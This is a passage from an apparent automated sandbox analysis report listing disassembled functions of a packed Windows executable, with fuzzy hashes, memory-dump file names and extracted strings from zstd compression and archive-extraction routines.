                                                                                                                                                                                                            • Instruction ID: 435e9567f4c88d479ed6596a135b9955da89eb5d09c799e518fec1db44f26e1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 114f6e887864c9452b6e749f16f8915dfecf3fe5e2a9eda231f9669842758b46
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28619C66B0AA46AAFB12DF61A4053AD23A5FB44BD8F040535DE0E13798DF3CD469C368
                                                                                                                                                                                                            Function 00007FF8A7FF93D0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Object_String$Arg_AttrCallDeallocKeywords_MallocMem_MemoryObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|KkOO:stream_writer$error setting source size: %s$must pass an object with a write() method$write
                                                                                                                                                                                                            • API String ID: 1212497781-2550967486
                                                                                                                                                                                                            • Opcode ID: e452cf039bbcf14119e626ec4ff6efa25af9fbc962411fef92bac67f2c767707
                                                                                                                                                                                                            • Instruction ID: 50d881c3f6202fea878a1de745c1692d7079f5aa52d71f8b0d168d84ced46b38
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e452cf039bbcf14119e626ec4ff6efa25af9fbc962411fef92bac67f2c767707
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8515C32A09F4191EF50CF25E84426C33A4FB98BD4F164236CA6E837A4DF39D9A5C750
                                                                                                                                                                                                            Function 00007FF8A7FFB2F0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 104threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Eval_SizeThread$Arg_Buffer_CallDeallocFormatFromKeywords_Long_Method_Object_ParseReleaseRestoreSaveSize_tStringTuple
                                                                                                                                                                                                            • String ID: stream is closed$write$y*:write$zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 11577103-1267270225
                                                                                                                                                                                                            • Opcode ID: 7f5e3c9c8c2f5d628b9e73e6d61b38095ba3ac1c94ae05fe3081825efbb7c134
                                                                                                                                                                                                            • Instruction ID: a122d04be74536f13194d52e8451c35db85fd280e854497c5d02c16c21d19a8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f5e3c9c8c2f5d628b9e73e6d61b38095ba3ac1c94ae05fe3081825efbb7c134
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22416A22A0AB86A2EF609F61E85036973A0FB89FD4F440232CD4D53BA8DF7CD565D714
                                                                                                                                                                                                            Function 00007FF8A7FF2940 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 135COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$DeallocErr_Size$Bytes_CallMethod_Object_memmove
                                                                                                                                                                                                            • String ID: empty input$input exhausted$output flushed$read$skip_bytes larger than first input chunk; this scenario is currently unsupported
                                                                                                                                                                                                            • API String ID: 2468093315-3641255437
                                                                                                                                                                                                            • Opcode ID: 97b5381b809c0deef40c0f3da52942243a7b1eb6456e7ec4660ccf2a22f9985d
                                                                                                                                                                                                            • Instruction ID: 5df10bd2cea50bbd431b9d96c6fe04c6fc7fcbbcf602794818176ec1ca1c37c2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97b5381b809c0deef40c0f3da52942243a7b1eb6456e7ec4660ccf2a22f9985d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA514832A0AB4291EF518F29E44427C73A0FB58BD4F444136DE8C0B6A9DF7CE695D708
                                                                                                                                                                                                            Function 00007FF8A7FFFAB0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 126COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintfmemmove$memset
                                                                                                                                                                                                            • String ID: %70s$statistics ...
                                                                                                                                                                                                            • API String ID: 2874110108-567790044
                                                                                                                                                                                                            • Opcode ID: b3207369c5fb7e5c867a2c8faa49bff396852c6391a003a834cf180303bfa8f3
                                                                                                                                                                                                            • Instruction ID: e1d400ce9cf0ba3f8c99f4c1af6f8cd7396cc19028836642c17e115fd8693b34
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3207369c5fb7e5c867a2c8faa49bff396852c6391a003a834cf180303bfa8f3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3041E132A0AA8665EE109F21E8143AE6390FB88BE4F400135DE5D077D4DF7CE644C700
                                                                                                                                                                                                            Function 00007FF8A7FF2B90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_Dealloc$String$Eval_FromSizeThreadmemmove$Err_FormatResizeRestoreSave
                                                                                                                                                                                                            • String ID: zstd decompress error: %s
                                                                                                                                                                                                            • API String ID: 2184362011-3499397093
                                                                                                                                                                                                            • Opcode ID: 011419c727a6c26ac5b5895457481b28c9b9c3392dd1c99cebb3d819f8400b46
                                                                                                                                                                                                            • Instruction ID: eef5ae6bd1c3c95817455120e803b63fed439da74810c4c1da524c7861262406
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 011419c727a6c26ac5b5895457481b28c9b9c3392dd1c99cebb3d819f8400b46
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33515C32A0AB8296EE54CF65E8442BEB3A4FB44BE0F144136CA9E07394DFBCE455D304
                                                                                                                                                                                                            Function 00007FF8A7FFEEE0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$FormatString
                                                                                                                                                                                                            • String ID: error resolving segment; this should not happen$item at offset %zd is too large for this platform$offset must be less than %zd$offset must be less than %zd$offset must be non-negative$offset must be non-negative
                                                                                                                                                                                                            • API String ID: 4212644371-688049692
                                                                                                                                                                                                            • Opcode ID: 83f31e855854578c42293d6b91b12c15aaa8d1d7ec5f3113b5115baa3ad9f62f
                                                                                                                                                                                                            • Instruction ID: 3236dbba5b51868f7f9598c4e4392a9d2a47f85043adb4e8084d4b7056a24397
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83f31e855854578c42293d6b91b12c15aaa8d1d7ec5f3113b5115baa3ad9f62f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C513E66B1AF4292DE04CF6AE88006873A1FB88FD4F845136DE5E437A8CF3CE1658714
                                                                                                                                                                                                            Function 00007FF8A7FF95D0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 108COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$Err_String$Arg_AttrBufferCallDeallocKeywords_MallocMem_MemoryObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|Kkk:read_to_iter$error setting source size: %s$must pass an object with a read() method or conforms to buffer protocol$read
                                                                                                                                                                                                            • API String ID: 2338418839-654044346
                                                                                                                                                                                                            • Opcode ID: 230c2607c617f34c560b9dd446b2651e55ac4502a94072390c58cbd81300306c
                                                                                                                                                                                                            • Instruction ID: b96158b5029aa4165f06cd156d75cbf6ed57c4ef3e509c98209f12f277769e17
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 230c2607c617f34c560b9dd446b2651e55ac4502a94072390c58cbd81300306c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7514432A0AB4691EF50CF25E88436933A0FB88BD4F154136CA9E877A4DF3DD5A9C714
                                                                                                                                                                                                            Function 00007FF8A7FF98E0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 104threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_Eval_SizeStringThread$Arg_Buffer_DeallocErr_FormatFromKeywords_ParseReleaseRestoreSaveTuple
                                                                                                                                                                                                            • String ID: cannot compress: %s$error setting source size: %s$unexpected partial frame flush$y*|O:compress
                                                                                                                                                                                                            • API String ID: 2919305294-1558872577
                                                                                                                                                                                                            • Opcode ID: fd162a9d042665ea90e9d8c9bb91e8b183d6504be21296b8603a9d43bde8ce9b
                                                                                                                                                                                                            • Instruction ID: b49f7147a8dcface6c57b1f3c5e534db6a59bd1c1a1c2407e0debe81f6d06929
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd162a9d042665ea90e9d8c9bb91e8b183d6504be21296b8603a9d43bde8ce9b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17416032A0AB8692EE60DF65F8403B973A1FB84BD0F454136DA8E43BA4DF3CE5558714
                                                                                                                                                                                                            Function 00007FF8A7FF4C30 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 98COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Object_String$Arg_AttrBufferCallDeallocKeywords_MallocMem_MemoryObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|kkk:read_to_iter$must pass an object with a read() method or conforms to buffer protocol$read$skip_bytes must be smaller than read_size
                                                                                                                                                                                                            • API String ID: 2052652018-480093875
                                                                                                                                                                                                            • Opcode ID: 0557616c26847e9448f34c692d6396c0f68fda28b8ee09bf469835c802ebfadc
                                                                                                                                                                                                            • Instruction ID: 4cc5d335e0e8dc9ebfcfbb58a90e288bb6be3005f38f6074ac5ca2b78320ce94
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0557616c26847e9448f34c692d6396c0f68fda28b8ee09bf469835c802ebfadc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68410322A0AB06A1EF508F25E89437C33A1FB94BC4F558036CA5D867A4DF79D599C314
                                                                                                                                                                                                            Function 00007FF8A7FF6790 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 84COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String$Arg_ParseSizeTuple_
                                                                                                                                                                                                            • String ID: cannot seek to negative position with SEEK_SET$cannot seek zstd decompression stream backwards$cannot seek zstd decompression stream backwards$n|i:seek$read$stream is closed$zstd decompression streams cannot be seeked with SEEK_END
                                                                                                                                                                                                            • API String ID: 3337331331-2278467308
                                                                                                                                                                                                            • Opcode ID: 4a294a183ccdb09e7186108e75849e64b3c1c6f1738adbd0c06011fe05450fa5
                                                                                                                                                                                                            • Instruction ID: be275ebdd9789afac2ea5084a004565c90f9152e7a00cde481eb084ff075d3db
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a294a183ccdb09e7186108e75849e64b3c1c6f1738adbd0c06011fe05450fa5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431AB22E0AA42E1EF548F65F8902B863A0FF44BC0F594039DA4D476A4DF7CE595E314
                                                                                                                                                                                                            Function 00007FF8A7FF5910 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Formatmemset$callocfreemalloc
                                                                                                                                                                                                            • String ID: unable to reference prepared dictionary: %s$unable to set decoding format: %s$unable to set max window size: %s
                                                                                                                                                                                                            • API String ID: 1115549343-3834487836
                                                                                                                                                                                                            • Opcode ID: 0a4261e5568b4b5127d9ea91fed6b4ba57b2b1f773d85702e6bf53f4a4c8d535
                                                                                                                                                                                                            • Instruction ID: 5f1fa0e8d1bdacfac210cc69a0719f400820ee6a576b63b7b0e5c8f6b5198be8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a4261e5568b4b5127d9ea91fed6b4ba57b2b1f773d85702e6bf53f4a4c8d535
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A1B022A0AB8296EA688F35E5403BD63A0FF84BE0F044235CB6E077D4DF7CE6519714
                                                                                                                                                                                                            Function 00007FF7ACE81440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                            • API String ID: 0-666925554
                                                                                                                                                                                                            • Opcode ID: 437f6b1f2434eace19cd89ea29424d2acc198f60ce00cba360b2c46846cff29f
                                                                                                                                                                                                            • Instruction ID: a7fc1a1fd731f13f7e876c85c43d5293fea151095c3938a644b0df026b126a96
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 437f6b1f2434eace19cd89ea29424d2acc198f60ce00cba360b2c46846cff29f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2851CC71B0E782A5EA10BB11E6046B9F3A0AF41BE6F860031DD0D677B6EE3CE1458760
                                                                                                                                                                                                            Function 00007FF8A7FF6CC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_SizeString$From$Dealloc$Arg_Err_Keywords_ParseResizeTuplememmove
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$stream is closed
                                                                                                                                                                                                            • API String ID: 1115402114-2335832740
                                                                                                                                                                                                            • Opcode ID: 5d84b137e0622bc31e60dd31273003b38a27a6873750c0c51bc987a984097242
                                                                                                                                                                                                            • Instruction ID: 14ff2ed46f9c1f73a6942b2aa4d2d82a4b98143cd82ee68181dc71c7c211f2fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d84b137e0622bc31e60dd31273003b38a27a6873750c0c51bc987a984097242
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151CE32A0AA42A2EF508F34E85027D73A1FF94BE0F54423ADAAD462E4DF7CD195D714
                                                                                                                                                                                                            Function 00007FF8A7FFF230 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 110COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
